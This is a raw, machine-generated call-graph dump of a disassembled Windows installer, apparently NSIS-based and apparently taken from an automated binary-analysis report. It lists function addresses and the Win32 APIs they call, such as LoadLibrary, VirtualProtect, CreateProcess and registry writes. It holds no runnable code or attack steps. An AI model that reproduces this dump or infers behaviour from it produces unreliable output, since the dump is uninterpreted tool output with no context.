4286->4226 4287->4286 4288->4287 4289 401fc3 4290 401fd5 4289->4290 4299 402087 4289->4299 4312 402bbf 4290->4312 4292 401423 25 API calls 4300 4021e1 4292->4300 4294 402bbf 18 API calls 4295 401fe5 4294->4295 4296 401ffb LoadLibraryExW 4295->4296 4297 401fed GetModuleHandleW 4295->4297 4298 40200c 4296->4298 4296->4299 4297->4296 4297->4298 4318 40649a WideCharToMultiByte 4298->4318 4299->4292 4303 402056 4307 4051b4 25 API calls 4303->4307 4304 40201d 4305 402025 4304->4305 4306 40203c 4304->4306 4363 401423 4305->4363 4321 10001759 4306->4321 4309 40202d 4307->4309 4309->4300 4310 402079 FreeLibrary 4309->4310 4310->4300 4313 402bcb 4312->4313 4314 406077 18 API calls 4313->4314 4315 402bec 4314->4315 4316 401fdc 4315->4316 4317 4062e9 5 API calls 4315->4317 4316->4294 4317->4316 4319 4064c4 GetProcAddress 4318->4319 4320 402017 4318->4320 4319->4320 4320->4303 4320->4304 4322 10001789 4321->4322 4366 10001b18 4322->4366 4324 10001790 4325 100018a6 4324->4325 4326 100017a1 4324->4326 4327 100017a8 4324->4327 4325->4309 4415 10002286 4326->4415 4398 100022d0 4327->4398 4332 1000180c 4338 10001812 4332->4338 4339 1000184e 4332->4339 4333 100017ee 4428 100024a9 4333->4428 4334 100017d7 4347 100017cd 4334->4347 4425 10002b5f 4334->4425 4335 100017be 4337 100017c4 4335->4337 4341 100017cf 4335->4341 4337->4347 4409 100028a4 4337->4409 4343 100015b4 3 API calls 4338->4343 4345 100024a9 10 API calls 4339->4345 4340 100017f4 4439 100015b4 4340->4439 4419 10002645 4341->4419 4349 10001828 4343->4349 4350 10001840 4345->4350 4347->4332 4347->4333 4353 100024a9 10 API calls 4349->4353 4354 10001895 4350->4354 4450 1000246c 4350->4450 4352 100017d5 4352->4347 4353->4350 4354->4325 4358 1000189f GlobalFree 4354->4358 4358->4325 4360 10001881 4360->4354 4454 1000153d wsprintfW 4360->4454 4361 1000187a FreeLibrary 4361->4360 4364 4051b4 25 API calls 4363->4364 4365 401431 4364->4365 4365->4309 4457 1000121b GlobalAlloc 4366->4457 4368 10001b3c 4458 1000121b GlobalAlloc 4368->4458 4370 10001d7a GlobalFree GlobalFree GlobalFree 4371 10001d97 4370->4371 4388 10001de1 4370->4388 4372 100020ee 4371->4372 4380 10001dac 4371->4380 4371->4388 4374 10002110 GetModuleHandleW 4372->4374 4372->4388 4373 10001c1d GlobalAlloc 4391 10001b47 4373->4391 4376 10002121 LoadLibraryW 4374->4376 4377 10002136 4374->4377 4375 10001c86 GlobalFree 4375->4391 4376->4377 4376->4388 4465 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4377->4465 4378 10001c68 lstrcpyW 4381 10001c72 lstrcpyW 4378->4381 4380->4388 4461 1000122c 4380->4461 4381->4391 4382 10002188 4384 10002195 lstrlenW 4382->4384 4382->4388 4383 10002048 4383->4388 4392 10002090 lstrcpyW 4383->4392 4466 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4384->4466 4388->4324 4389 10002148 4389->4382 4397 10002172 GetProcAddress 4389->4397 4390 100021af 4390->4388 4391->4370 4391->4373 4391->4375 4391->4378 4391->4381 4391->4383 4391->4388 4393 10001cc4 4391->4393 4394 10001f37 GlobalFree 4391->4394 4396 1000122c 2 API calls 4391->4396 4464 1000121b GlobalAlloc 4391->4464 4392->4388 4393->4391 4459 1000158f GlobalSize GlobalAlloc 4393->4459 4394->4391 4396->4391 4397->4382 4405 100022e8 4398->4405 4400 10002415 GlobalFree 4404 100017ae 4400->4404 4400->4405 4401 100023d3 lstrlenW 4401->4400 4408 100023de 4401->4408 4402 100023ba GlobalAlloc CLSIDFromString 4402->4400 4403 1000238f GlobalAlloc WideCharToMultiByte 4403->4400 4404->4334 4404->4335 4404->4347 4405->4400 4405->4401 4405->4402 4405->4403 4406 1000122c GlobalAlloc lstrcpynW 4405->4406 4468 100012ba 4405->4468 4406->4405 4408->4400 4472 100025d9 4408->4472 4411 100028b6 4409->4411 4410 1000295b ReadFile 4412 10002979 4410->4412 4411->4410 4413 10002a75 4412->4413 4414 10002a6a GetLastError 4412->4414 4413->4347 4414->4413 4416 10002296 4415->4416 4417 100017a7 4415->4417 4416->4417 4418 100022a8 GlobalAlloc 4416->4418 4417->4327 4418->4416 4423 10002661 4419->4423 4420 100026b2 GlobalAlloc 4424 100026d4 4420->4424 4421 100026c5 4422 100026ca GlobalSize 4421->4422 4421->4424 4422->4424 4423->4420 4423->4421 4424->4352 4427 10002b6a 4425->4427 4426 10002baa GlobalFree 4427->4426 4475 1000121b GlobalAlloc 4428->4475 4430 10002530 StringFromGUID2 4436 100024b3 4430->4436 4431 10002541 lstrcpynW 4431->4436 4432 1000250b MultiByteToWideChar 4432->4436 4433 10002571 GlobalFree 4433->4436 4434 10002554 wsprintfW 4434->4436 4435 100025ac GlobalFree 4435->4340 4436->4430 4436->4431 4436->4432 4436->4433 4436->4434 4436->4435 4437 10001272 2 API calls 4436->4437 4476 100012e1 4436->4476 4437->4436 4480 1000121b GlobalAlloc 4439->4480 4441 100015ba 4442 100015c7 lstrcpyW 4441->4442 4444 100015e1 4441->4444 4445 100015fb 4442->4445 4444->4445 4446 100015e6 wsprintfW 4444->4446 4447 10001272 4445->4447 4446->4445 4448 100012b5 GlobalFree 4447->4448 4449 1000127b GlobalAlloc lstrcpynW 4447->4449 4448->4350 4449->4448 4451 1000247a 4450->4451 4452 10001861 4450->4452 4451->4452 4453 10002496 GlobalFree 4451->4453 4452->4360 4452->4361 4453->4451 4455 10001272 2 API calls 4454->4455 4456 1000155e 4455->4456 4456->4354 4457->4368 4458->4391 4460 100015ad 4459->4460 4460->4393 4467 1000121b GlobalAlloc 4461->4467 4463 1000123b lstrcpynW 4463->4388 4464->4391 4465->4389 4466->4390 4467->4463 4469 100012c1 4468->4469 4470 1000122c 2 API calls 4469->4470 4471 100012df 4470->4471 4471->4405 4473 100025e7 VirtualAlloc 4472->4473 4474 1000263d 4472->4474 4473->4474 4474->4408 4475->4436 4477 100012ea 4476->4477 4478 1000130c 4476->4478 4477->4478 4479 100012f0 lstrcpyW 4477->4479 4478->4436 4479->4478 4480->4441 4854 4016c4 4855 402bbf 18 API calls 4854->4855 4856 4016ca GetFullPathNameW 4855->4856 4857 4016e4 4856->4857 4858 401706 4856->4858 4857->4858 4861 406398 2 API calls 4857->4861 4859 40171b GetShortPathNameW 4858->4859 4860 402a4c 4858->4860 4859->4860 4862 4016f6 4861->4862 4862->4858 4864 406055 lstrcpynW 4862->4864 4864->4858 4865 4014cb 4866 4051b4 25 API calls 4865->4866 4867 4014d2 4866->4867 4868 40194e 4869 402bbf 18 API calls 4868->4869 4870 401955 lstrlenW 4869->4870 4871 402531 4870->4871 4872 4027ce 4873 4027d6 4872->4873 4874 4027da FindNextFileW 4873->4874 4877 4027ec 4873->4877 4875 402833 4874->4875 4874->4877 4878 406055 lstrcpynW 4875->4878 4878->4877 4647 401754 4648 402bbf 18 API calls 4647->4648 4649 40175b 4648->4649 4650 405c59 2 API calls 4649->4650 4651 401762 4650->4651 4652 405c59 2 API calls 4651->4652 4652->4651 4879 401d56 GetDC GetDeviceCaps 4880 402ba2 18 API calls 4879->4880 4881 401d74 MulDiv ReleaseDC 4880->4881 4882 402ba2 18 API calls 4881->4882 4883 401d93 4882->4883 4884 406077 18 API calls 4883->4884 4885 401dcc CreateFontIndirectW 4884->4885 4886 402531 4885->4886 4669 4014d7 4670 402ba2 18 API calls 4669->4670 4671 4014dd Sleep 4670->4671 4673 402a4c 4671->4673 4887 401a57 4888 402ba2 18 API calls 4887->4888 4889 401a5d 4888->4889 4890 402ba2 18 API calls 4889->4890 4891 401a05 4890->4891 4892 40155b 4893 4029f2 4892->4893 4896 405f9c wsprintfW 4893->4896 4895 4029f7 4896->4895 4897 40385c 4898 403867 4897->4898 4899 40386b 4898->4899 4900 40386e GlobalAlloc 4898->4900 4900->4899 4765 4022df 4766 402bbf 18 API calls 4765->4766 4767 4022ee 4766->4767 4768 402bbf 18 API calls 4767->4768 4769 4022f7 4768->4769 4770 402bbf 18 API calls 4769->4770 4771 402301 GetPrivateProfileStringW 4770->4771 4901 401bdf 4902 402ba2 18 API calls 4901->4902 4903 401be6 4902->4903 4904 402ba2 18 API calls 4903->4904 4905 401bf0 4904->4905 4906 401c00 4905->4906 4907 402bbf 18 API calls 4905->4907 4908 401c10 4906->4908 4909 402bbf 18 API calls 4906->4909 4907->4906 4910 401c1b 4908->4910 4911 401c5f 4908->4911 4909->4908 4912 402ba2 18 API calls 4910->4912 4913 402bbf 18 API calls 4911->4913 4914 401c20 4912->4914 4915 401c64 4913->4915 4916 402ba2 18 API calls 4914->4916 4917 402bbf 18 API calls 4915->4917 4918 401c29 4916->4918 4919 401c6d FindWindowExW 4917->4919 4920 401c31 SendMessageTimeoutW 4918->4920 4921 401c4f SendMessageW 4918->4921 4922 401c8f 4919->4922 4920->4922 4921->4922 4923 401960 4924 402ba2 18 API calls 4923->4924 4925 401967 4924->4925 4926 402ba2 18 API calls 4925->4926 4927 401971 4926->4927 4928 402bbf 18 API calls 4927->4928 4929 40197a 4928->4929 4930 40198e lstrlenW 4929->4930 4931 4019ca 4929->4931 4932 401998 4930->4932 4932->4931 4936 406055 lstrcpynW 4932->4936 4934 4019b3 4934->4931 4935 4019c0 lstrlenW 4934->4935 4935->4931 4936->4934 4937 401662 4938 402bbf 18 API calls 4937->4938 4939 401668 4938->4939 4940 406398 2 API calls 4939->4940 4941 40166e 4940->4941 4942 4019e4 4943 402bbf 18 API calls 4942->4943 4944 4019eb 4943->4944 4945 402bbf 18 API calls 4944->4945 4946 4019f4 4945->4946 4947 4019fb lstrcmpiW 4946->4947 4948 401a0d lstrcmpW 4946->4948 4949 401a01 4947->4949 4948->4949 4481 4025e5 4495 402ba2 4481->4495 4483 4025f4 4484 40263a ReadFile 4483->4484 4485 405cad ReadFile 4483->4485 4486 4026d3 4483->4486 4487 40267a MultiByteToWideChar 4483->4487 4488 40272f 4483->4488 4491 4026a0 SetFilePointer MultiByteToWideChar 4483->4491 4492 402740 4483->4492 4494 40272d 4483->4494 4484->4483 4484->4494 4485->4483 4486->4483 4486->4494 4498 405d0b SetFilePointer 4486->4498 4487->4483 4507 405f9c wsprintfW 4488->4507 4491->4483 4493 402761 SetFilePointer 4492->4493 4492->4494 4493->4494 4496 406077 18 API calls 4495->4496 4497 402bb6 4496->4497 4497->4483 4499 405d27 4498->4499 4501 405d43 4498->4501 4500 405cad ReadFile 4499->4500 4502 405d33 4500->4502 4501->4486 4502->4501 4503 405d74 SetFilePointer 4502->4503 4504 405d4c SetFilePointer 4502->4504 4503->4501 4504->4503 4505 405d57 4504->4505 4506 405cdc WriteFile 4505->4506 4506->4501 4507->4494 4508 401e66 4509 402bbf 18 API calls 4508->4509 4510 401e6c 4509->4510 4511 4051b4 25 API calls 4510->4511 4512 401e76 4511->4512 4513 405735 2 API calls 4512->4513 4514 401e7c 4513->4514 4515 401edb CloseHandle 4514->4515 4516 401e8c WaitForSingleObject 4514->4516 4517 40281e 4514->4517 4515->4517 4518 401e9e 4516->4518 4519 401eb0 GetExitCodeProcess 4518->4519 4520 406467 2 API calls 4518->4520 4521 401ec2 4519->4521 4522 401ecf 4519->4522 4523 401ea5 WaitForSingleObject 4520->4523 4526 405f9c wsprintfW 4521->4526 4522->4515 4525 401ecd 4522->4525 4523->4518 4525->4515 4526->4525 4536 401767 4537 402bbf 18 API calls 4536->4537 4538 40176e 4537->4538 4539 401796 4538->4539 4540 40178e 4538->4540 4577 406055 lstrcpynW 4539->4577 4576 406055 lstrcpynW 4540->4576 4543 401794 4546 4062e9 5 API calls 4543->4546 4544 4017a1 4545 405a09 3 API calls 4544->4545 4547 4017a7 lstrcatW 4545->4547 4555 4017b3 4546->4555 4547->4543 4548 406398 2 API calls 4548->4555 4549 4017ef 4550 405c05 2 API calls 4549->4550 4550->4555 4552 4017c5 CompareFileTime 4552->4555 4553 401885 4554 4051b4 25 API calls 4553->4554 4557 40188f 4554->4557 4555->4548 4555->4549 4555->4552 4555->4553 4556 406055 lstrcpynW 4555->4556 4562 406077 18 API calls 4555->4562 4570 40579a MessageBoxIndirectW 4555->4570 4573 40185c 4555->4573 4575 405c2a GetFileAttributesW CreateFileW 4555->4575 4556->4555 4559 403027 32 API calls 4557->4559 4558 4051b4 25 API calls 4574 401871 4558->4574 4560 4018a2 4559->4560 4561 4018b6 SetFileTime 4560->4561 4563 4018c8 CloseHandle 4560->4563 4561->4563 4562->4555 4564 4018d9 4563->4564 4563->4574 4565 4018f1 4564->4565 4566 4018de 4564->4566 4568 406077 18 API calls 4565->4568 4567 406077 18 API calls 4566->4567 4571 4018e6 lstrcatW 4567->4571 4569 4018f9 4568->4569 4572 40579a MessageBoxIndirectW 4569->4572 4570->4555 4571->4569 4572->4574 4573->4558 4573->4574 4575->4555 4576->4543 4577->4544 4950 404267 lstrlenW 4951 404286 4950->4951 4952 404288 WideCharToMultiByte 4950->4952 4951->4952 4953 401ee9 4954 402bbf 18 API calls 4953->4954 4955 401ef0 4954->4955 4956 406398 2 API calls 4955->4956 4957 401ef6 4956->4957 4958 401f07 4957->4958 4960 405f9c wsprintfW 4957->4960 4960->4958 4961 100018a9 4962 100018cc 4961->4962 4963 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 4962->4963 4964 100018ff GlobalFree 4962->4964 4965 10001272 2 API calls 4963->4965 4964->4963 4966 10001a87 GlobalFree GlobalFree 4965->4966 4967 4021ea 4968 402bbf 18 API calls 4967->4968 4969 4021f0 4968->4969 4970 402bbf 18 API calls 4969->4970 4971 4021f9 4970->4971 4972 402bbf 18 API calls 4971->4972 4973 402202 4972->4973 4974 406398 2 API calls 4973->4974 4975 40220b 4974->4975 4976 40221c lstrlenW lstrlenW 4975->4976 4980 40220f 4975->4980 4978 4051b4 25 API calls 4976->4978 4977 4051b4 25 API calls 4981 402217 4977->4981 4979 40225a SHFileOperationW 4978->4979 4979->4980 4979->4981 4980->4977 4980->4981 4982 40156b 4983 401584 4982->4983 4984 40157b ShowWindow 4982->4984 4985 401592 ShowWindow 4983->4985 4986 402a4c 4983->4986 4984->4983 4985->4986 4987 40456d 4988 4045a3 4987->4988 4989 40457d 4987->4989 4991 404180 8 API calls 4988->4991 4990 404119 19 API calls 4989->4990 4992 40458a SetDlgItemTextW 4990->4992 4993 4045af 4991->4993 4992->4988 4994 40226e 4995 402275 4994->4995 4997 402288 4994->4997 4996 406077 18 API calls 4995->4996 4998 402282 4996->4998 4999 40579a MessageBoxIndirectW 4998->4999 4999->4997 5000 4014f1 SetForegroundWindow 5001 402a4c 5000->5001 4597 4052f3 4598 405314 GetDlgItem GetDlgItem GetDlgItem 4597->4598 4599 40549d 4597->4599 4643 40414e SendMessageW 4598->4643 4601 4054a6 GetDlgItem CreateThread CloseHandle 4599->4601 4602 4054ce 4599->4602 4601->4602 4646 405287 5 API calls 4601->4646 4604 4054f9 4602->4604 4606 4054e5 ShowWindow ShowWindow 4602->4606 4607 40551e 4602->4607 4603 405384 4612 40538b GetClientRect GetSystemMetrics SendMessageW SendMessageW 4603->4612 4605 405505 4604->4605 4613 405559 4604->4613 4609 405533 ShowWindow 4605->4609 4610 40550d 4605->4610 4645 40414e SendMessageW 4606->4645 4611 404180 8 API calls 4607->4611 4616 405553 4609->4616 4617 405545 4609->4617 4614 4040f2 SendMessageW 4610->4614 4615 40552c 4611->4615 4618 4053f9 4612->4618 4619 4053dd SendMessageW SendMessageW 4612->4619 4613->4607 4620 405567 SendMessageW 4613->4620 4614->4607 4625 4040f2 SendMessageW 4616->4625 4624 4051b4 25 API calls 4617->4624 4621 40540c 4618->4621 4622 4053fe SendMessageW 4618->4622 4619->4618 4620->4615 4623 405580 CreatePopupMenu 4620->4623 4627 404119 19 API calls 4621->4627 4622->4621 4626 406077 18 API calls 4623->4626 4624->4616 4625->4613 4628 405590 AppendMenuW 4626->4628 4629 40541c 4627->4629 4630 4055c0 TrackPopupMenu 4628->4630 4631 4055ad GetWindowRect 4628->4631 4632 405425 ShowWindow 4629->4632 4633 405459 GetDlgItem SendMessageW 4629->4633 4630->4615 4634 4055db 4630->4634 4631->4630 4635 405448 4632->4635 4636 40543b ShowWindow 4632->4636 4633->4615 4637 405480 SendMessageW SendMessageW 4633->4637 4638 4055f7 SendMessageW 4634->4638 4644 40414e SendMessageW 4635->4644 4636->4635 4637->4615 4638->4638 4639 405614 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4638->4639 4641 405639 SendMessageW 4639->4641 4641->4641 4642 405662 GlobalUnlock SetClipboardData CloseClipboard 4641->4642 4642->4615 4643->4603 4644->4633 4645->4604 5002 401673 5003 402bbf 18 API calls 5002->5003 5004 40167a 5003->5004 5005 402bbf 18 API calls 5004->5005 5006 401683 5005->5006 5007 402bbf 18 API calls 5006->5007 5008 40168c MoveFileW 5007->5008 5009 40169f 5008->5009 5015 401698 5008->5015 5011 406398 2 API calls 5009->5011 5013 4021e1 5009->5013 5010 401423 25 API calls 5010->5013 5012 4016ae 5011->5012 5012->5013 5014 405ef6 38 API calls 5012->5014 5014->5015 5015->5010 5016 100016b6 5017 100016e5 5016->5017 5018 10001b18 22 API calls 5017->5018 5019 100016ec 5018->5019 5020 100016f3 5019->5020 5021 100016ff 5019->5021 5022 10001272 2 API calls 5020->5022 5023 10001726 5021->5023 5024 10001709 5021->5024 5027 100016fd 5022->5027 5025 10001750 5023->5025 5026 1000172c 5023->5026 5028 1000153d 3 API calls 5024->5028 5030 1000153d 3 API calls 5025->5030 5029 100015b4 3 API calls 5026->5029 5031 1000170e 5028->5031 5032 10001731 5029->5032 5030->5027 5033 100015b4 3 API calls 5031->5033 5034 10001272 2 API calls 5032->5034 5035 10001714 5033->5035 5036 10001737 GlobalFree 5034->5036 5037 10001272 2 API calls 5035->5037 5036->5027 5038 1000174b GlobalFree 5036->5038 5039 1000171a GlobalFree 5037->5039 5038->5027 5039->5027 5040 10002238 5041 10002296 5040->5041 5043 100022cc 5040->5043 5042 100022a8 GlobalAlloc 5041->5042 5041->5043 5042->5041 5044 401cfa GetDlgItem GetClientRect 5045 402bbf 18 API calls 5044->5045 5046 401d2c LoadImageW SendMessageW 5045->5046 5047 401d4a DeleteObject 5046->5047 5048 402a4c 5046->5048 5047->5048 4723 40237b 4724 402381 4723->4724 4725 402bbf 18 API calls 4724->4725 4726 402393 4725->4726 4727 402bbf 18 API calls 4726->4727 4728 40239d RegCreateKeyExW 4727->4728 4729 4023c7 4728->4729 4731 40281e 4728->4731 4730 4023e2 4729->4730 4732 402bbf 18 API calls 4729->4732 4734 402ba2 18 API calls 4730->4734 4736 4023ee 4730->4736 4733 4023d8 lstrlenW 4732->4733 4733->4730 4734->4736 4735 402409 RegSetValueExW 4738 40241f RegCloseKey 4735->4738 4736->4735 4737 403027 32 API calls 4736->4737 4737->4735 4738->4731 5049 4027fb 5050 402bbf 18 API calls 5049->5050 5051 402802 FindFirstFileW 5050->5051 5052 402815 5051->5052 5053 40282a 5051->5053 5054 402833 5053->5054 5057 405f9c wsprintfW 5053->5057 5058 406055 lstrcpynW 5054->5058 5057->5054 5058->5052 5059 1000103d 5060 1000101b 5 API calls 5059->5060 5061 10001056 5060->5061 5062 401dfd EnableWindow 5063 402a4c 5062->5063 5064 4014ff 5065 401507 5064->5065 5067 40151a 5064->5067 5066 402ba2 18 API calls 5065->5066 5066->5067 5068 401000 5069 401037 BeginPaint GetClientRect 5068->5069 5070 40100c DefWindowProcW 5068->5070 5072 4010f3 5069->5072 5073 401179 5070->5073 5074 401073 CreateBrushIndirect FillRect DeleteObject 5072->5074 5075 4010fc 5072->5075 5074->5072 5076 401102 CreateFontIndirectW 5075->5076 5077 401167 EndPaint 5075->5077 5076->5077 5078 401112 6 API calls 5076->5078 5077->5073 5078->5077 5079 401904 5080 40193b 5079->5080 5081 402bbf 18 API calls 5080->5081 5082 401940 5081->5082 5083 405846 69 API calls 5082->5083 5084 401949 5083->5084 5085 402d04 5086 402d16 SetTimer 5085->5086 5088 402d2f 5085->5088 5086->5088 5087 402d84 5088->5087 5089 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5088->5089 5089->5087 4527 402786 4528 40278d 4527->4528 4530 4029f7 4527->4530 4529 402ba2 18 API calls 4528->4529 4531 402798 4529->4531 4532 40279f SetFilePointer 4531->4532 4532->4530 4533 4027af 4532->4533 4535 405f9c wsprintfW 4533->4535 4535->4530 4578 100027c7 4579 10002817 4578->4579 4580 100027d7 VirtualProtect 4578->4580 4580->4579 5090 401907 5091 402bbf 18 API calls 5090->5091 5092 40190e 5091->5092 5093 40579a MessageBoxIndirectW 5092->5093 5094 401917 5093->5094 5095 401e08 5096 402bbf 18 API calls 5095->5096 5097 401e0e 5096->5097 5098 402bbf 18 API calls 5097->5098 5099 401e17 5098->5099 5100 402bbf 18 API calls 5099->5100 5101 401e20 5100->5101 5102 402bbf 18 API calls 5101->5102 5103 401e29 5102->5103 5104 401423 25 API calls 5103->5104 5105 401e30 ShellExecuteW 5104->5105 5106 401e61 5105->5106 5112 40490a 5113 404936 5112->5113 5114 40491a 5112->5114 5116 404969 5113->5116 5117 40493c SHGetPathFromIDListW 5113->5117 5123 40577e GetDlgItemTextW 5114->5123 5119 404953 SendMessageW 5117->5119 5120 40494c 5117->5120 5118 404927 SendMessageW 5118->5113 5119->5116 5121 40140b 2 API calls 5120->5121 5121->5119 5123->5118 5124 1000164f 5125 10001516 GlobalFree 5124->5125 5127 10001667 5125->5127 5126 100016ad GlobalFree 5127->5126 5128 10001682 5127->5128 5129 10001699 VirtualFree 5127->5129 5128->5126 5129->5126 4653 402095 4654 402bbf 18 API calls 4653->4654 4655 40209c 4654->4655 4656 402bbf 18 API calls 4655->4656 4657 4020a6 4656->4657 4658 402bbf 18 API calls 4657->4658 4659 4020b0 4658->4659 4660 402bbf 18 API calls 4659->4660 4661 4020ba 4660->4661 4662 402bbf 18 API calls 4661->4662 4664 4020c4 4662->4664 4663 402103 CoCreateInstance 4668 402122 4663->4668 4664->4663 4665 402bbf 18 API calls 4664->4665 4665->4663 4666 401423 25 API calls 4667 4021e1 4666->4667 4668->4666 4668->4667 5130 401a15 5131 402bbf 18 API calls 5130->5131 5132 401a1e ExpandEnvironmentStringsW 5131->5132 5133 401a32 5132->5133 5135 401a45 5132->5135 5134 401a37 lstrcmpW 5133->5134 5133->5135 5134->5135 5136 402515 5137 402bbf 18 API calls 5136->5137 5138 40251c 5137->5138 5141 405c2a GetFileAttributesW CreateFileW 5138->5141 5140 402528 5140->5140 5141->5140 5142 401b16 5143 402bbf 18 API calls 5142->5143 5144 401b1d 5143->5144 5145 402ba2 18 API calls 5144->5145 5146 401b26 wsprintfW 5145->5146 5147 402a4c 5146->5147 5148 10001058 5150 10001074 5148->5150 5149 100010dd 5150->5149 5151 10001516 GlobalFree 5150->5151 5152 10001092 5150->5152 5151->5152 5153 10001516 GlobalFree 5152->5153 5154 100010a2 5153->5154 5155 100010b2 5154->5155 5156 100010a9 GlobalSize 5154->5156 5157 100010b6 GlobalAlloc 5155->5157 5158 100010c7 5155->5158 5156->5155 5159 1000153d 3 API calls 5157->5159 5160 100010d2 GlobalFree 5158->5160 5159->5158 5160->5149 4740 40159b 4741 402bbf 18 API calls 4740->4741 4742 4015a2 SetFileAttributesW 4741->4742 4743 4015b4 4742->4743 4744 40229d 4745 4022a5 4744->4745 4746 4022ab 4744->4746 4748 402bbf 18 API calls 4745->4748 4747 4022b9 4746->4747 4749 402bbf 18 API calls 4746->4749 4750 4022c7 4747->4750 4751 402bbf 18 API calls 4747->4751 4748->4746 4749->4747 4752 402bbf 18 API calls 4750->4752 4751->4750 4753 4022d0 WritePrivateProfileStringW 4752->4753 5161 401f1d 5162 402bbf 18 API calls 5161->5162 5163 401f24 5162->5163 5164 40642b 5 API calls 5163->5164 5165 401f33 5164->5165 5166 401fb7 5165->5166 5167 401f4f GlobalAlloc 5165->5167 5167->5166 5168 401f63 5167->5168 5169 40642b 5 API calls 5168->5169 5170 401f6a 5169->5170 5171 40642b 5 API calls 5170->5171 5172 401f74 5171->5172 5172->5166 5176 405f9c wsprintfW 5172->5176 5174 401fa9 5177 405f9c wsprintfW 5174->5177 5176->5174 5177->5166 4754 40249e 4755 402cc9 19 API calls 4754->4755 4756 4024a8 4755->4756 4757 402ba2 18 API calls 4756->4757 4758 4024b1 4757->4758 4759 4024bc 4758->4759 4762 40281e 4758->4762 4760 4024d5 RegEnumValueW 4759->4760 4761 4024c9 RegEnumKeyW 4759->4761 4760->4762 4763 4024ee RegCloseKey 4760->4763 4761->4763 4763->4762 5178 40149e 5179 402288 5178->5179 5180 4014ac PostQuitMessage 5178->5180 5180->5179 4772 40231f 4773 402324 4772->4773 4774 40234f 4772->4774 4775 402cc9 19 API calls 4773->4775 4776 402bbf 18 API calls 4774->4776 4777 40232b 4775->4777 4779 402356 4776->4779 4778 402335 4777->4778 4781 40236c 4777->4781 4780 402bbf 18 API calls 4778->4780 4784 402bff RegOpenKeyExW 4779->4784 4782 40233c RegDeleteValueW RegCloseKey 4780->4782 4782->4781 4785 402c93 4784->4785 4792 402c2a 4784->4792 4785->4781 4786 402c50 RegEnumKeyW 4787 402c62 RegCloseKey 4786->4787 4786->4792 4788 40642b 5 API calls 4787->4788 4791 402c72 4788->4791 4789 402c87 RegCloseKey 4794 402c76 4789->4794 4790 402bff 5 API calls 4790->4792 4793 402ca2 RegDeleteKeyW 4791->4793 4791->4794 4792->4786 4792->4787 4792->4789 4792->4790 4793->4794 4794->4785 3713 4032a0 SetErrorMode GetVersion 3714 4032d4 3713->3714 3715 4032da 3713->3715 3716 40642b 5 API calls 3714->3716 3804 4063bf GetSystemDirectoryW 3715->3804 3716->3715 3718 4032f1 3719 4063bf 3 API calls 3718->3719 3720 4032fb 3719->3720 3721 4063bf 3 API calls 3720->3721 3722 403305 3721->3722 3807 40642b GetModuleHandleA 3722->3807 3725 40642b 5 API calls 3726 403313 #17 OleInitialize SHGetFileInfoW 3725->3726 3813 406055 lstrcpynW 3726->3813 3728 403350 GetCommandLineW 3814 406055 lstrcpynW 3728->3814 3730 403362 GetModuleHandleW 3731 40337a 3730->3731 3815 405a36 3731->3815 3734 4034b4 GetTempPathW 3819 40326f 3734->3819 3736 4034cc 3737 4034d0 GetWindowsDirectoryW lstrcatW 3736->3737 3738 403526 DeleteFileW 3736->3738 3740 40326f 12 API calls 3737->3740 3829 402dee GetTickCount GetModuleFileNameW 3738->3829 3739 4033a2 3741 405a36 CharNextW 3739->3741 3747 40349f 3739->3747 3749 40349d 3739->3749 3743 4034ec 3740->3743 3741->3739 3743->3738 3745 4034f0 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3743->3745 3744 40353a 3750 405a36 CharNextW 3744->3750 3786 4035dd 3744->3786 3799 4035ed 3744->3799 3748 40326f 12 API calls 3745->3748 3913 406055 lstrcpynW 3747->3913 3754 40351e 3748->3754 3749->3734 3766 403559 3750->3766 3754->3738 3754->3799 3755 403728 3758 403730 GetCurrentProcess OpenProcessToken 3755->3758 3759 4037ac ExitProcess 3755->3759 3756 403608 3937 40579a 3756->3937 3764 403748 LookupPrivilegeValueW AdjustTokenPrivileges 3758->3764 3765 40377c 3758->3765 3761 4035b7 3914 405b11 3761->3914 3762 40361e 3941 40571d 3762->3941 3764->3765 3769 40642b 5 API calls 3765->3769 3766->3761 3766->3762 3780 403783 3769->3780 3772 403798 ExitWindowsEx 3772->3759 3775 4037a5 3772->3775 3773 403634 lstrcatW 3774 40363f lstrcatW lstrcmpiW 3773->3774 3777 40365b 3774->3777 3774->3799 3979 40140b 3775->3979 3778 403660 3777->3778 3779 403667 3777->3779 3944 405683 CreateDirectoryW 3778->3944 3949 405700 CreateDirectoryW 3779->3949 3780->3772 3780->3775 3782 4035d2 3929 406055 lstrcpynW 3782->3929 3857 40389e 3786->3857 3788 40366c SetCurrentDirectoryW 3789 403687 3788->3789 3790 40367c 3788->3790 3953 406055 lstrcpynW 3789->3953 3952 406055 lstrcpynW 3790->3952 3795 4036d3 CopyFileW 3801 403695 3795->3801 3796 40371c 3798 405ef6 38 API calls 3796->3798 3798->3799 3930 4037c4 3799->3930 3800 406077 18 API calls 3800->3801 3801->3796 3801->3800 3803 403707 CloseHandle 3801->3803 3954 406077 3801->3954 3972 405ef6 MoveFileExW 3801->3972 3976 405735 CreateProcessW 3801->3976 3803->3801 3805 4063e1 wsprintfW LoadLibraryW 3804->3805 3805->3718 3808 406451 GetProcAddress 3807->3808 3809 406447 3807->3809 3811 40330c 3808->3811 3810 4063bf 3 API calls 3809->3810 3812 40644d 3810->3812 3811->3725 3812->3808 3812->3811 3813->3728 3814->3730 3816 405a3c 3815->3816 3817 403389 CharNextW 3816->3817 3818 405a43 CharNextW 3816->3818 3817->3734 3817->3739 3818->3816 3982 4062e9 3819->3982 3821 403285 3821->3736 3822 40327b 3822->3821 3991 405a09 lstrlenW CharPrevW 3822->3991 3825 405700 2 API calls 3826 403293 3825->3826 3994 405c59 3826->3994 3998 405c2a GetFileAttributesW CreateFileW 3829->3998 3831 402e2e 3856 402e3e 3831->3856 3999 406055 lstrcpynW 3831->3999 3833 402e54 4000 405a55 lstrlenW 3833->4000 3837 402e65 GetFileSize 3838 402f61 3837->3838 3855 402e7c 3837->3855 4005 402d8a 3838->4005 3840 402f6a 3842 402f9a GlobalAlloc 3840->3842 3840->3856 4040 403258 SetFilePointer 3840->4040 4016 403258 SetFilePointer 3842->4016 3844 402fcd 3846 402d8a 6 API calls 3844->3846 